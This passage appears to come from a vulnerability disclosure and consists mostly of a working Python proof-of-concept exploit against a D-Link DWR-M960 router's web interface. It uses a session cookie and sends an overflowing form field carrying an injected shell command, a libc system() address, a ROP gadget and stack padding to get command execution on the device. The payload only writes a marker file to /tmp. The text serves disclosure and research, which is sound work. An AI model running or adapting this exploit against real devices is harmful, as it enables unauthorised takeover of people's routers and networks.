and here is the POC, ugly, but working:```#! /usr/bin/python3import requestsimport sys# just auth with a browsre and grab cookie# the js code is awful, I'm too bored to reverse itcookies = {"webuicookie":sys.argv[1]}host="http://127.0.0.1" #adjust# We need to browse /wlmultipleap.htm firstpage1="/wlmultipleap.htm"# otherwise form is not accessiblepage2="/boafrm/formWlanMultipleAP"r = requests.get(host+page1, cookies=cookies)hdr={"Content-Type": "application/x-www-form-urlencoded"}data="wlanIdx=wlanidx&wl_ssid1=wl_ssid&submit-url="data = data+"%2f"+"aa;echo dlink dwrM960_is_pwned>/tmp/pwn; id >> /tmp/pwn;"+"a"*209data = data+"%e8%50%d5%3F" #system() @ in libc : 0x3fd25000+0x300E8 : s0 registerdata = data+"aaaaaabaacaadaaeaafaagaahaaiaaja" #paddata = data+"%1C%F4%D3%3F" #gadget@ move t9,s0; jalr t9, lw a0,64(sp)data = data+"akaalaamaanaaoaapaaqaaraasaataauaavaawaaxaayaazabaabbabcabdabeab" #paddata = data+"%C8%01%80%40" #stack addr 0x408001c8data = data+"fabgabhabiabjabkablabmabnaboabpabqabrabsabtabuabvabwabxabyabzacaacbaccacdaceacfacgachaciacjackaclacmac.htm" #padr = requests.post(host+page2, cookies=cookies, headers=hdr, data=data)```In my poc, i wanted to do:`echo dlink dwrM960_is_pwned>/tmp/pwn; id >> /tmp/pwn;`but the id applet is not compiled in the busybox
